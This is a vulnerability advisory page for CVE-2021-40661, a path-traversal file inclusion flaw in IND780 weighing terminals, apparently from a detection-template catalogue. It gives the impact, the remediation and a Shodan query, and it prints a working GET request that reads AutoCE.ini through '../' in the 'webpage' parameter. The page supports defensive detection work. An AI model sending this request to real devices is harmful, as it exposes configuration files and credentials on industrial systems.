🔙 목록으로 돌아가기

CVE-2021-40661: IND780 - Local File Inclusion

TitleIND780 - Local File Inclusion
AuthorFor3stCo1d
SeverityHigh
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system.
RemediationApply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks.
CVSS Score7.5
EPSS Score0.86991
CVE IDCVE-2021-40661
CWE IDCWE-22
Shodan QueryIND780ind780
Tags cve2021 cve ind780 lfi mt vuln

🔍 Vulnerability Description

IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label ‘IND780_8.0.07’), Version 7.2.10 June 18, 2012 (SS Label ‘IND780_7.2.10’) is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the ‘webpage’ parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.

🌐 HTTP Request

GET /IND780/excalweb.dll?webpage=../../AutoCE.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-40661.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-40661.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A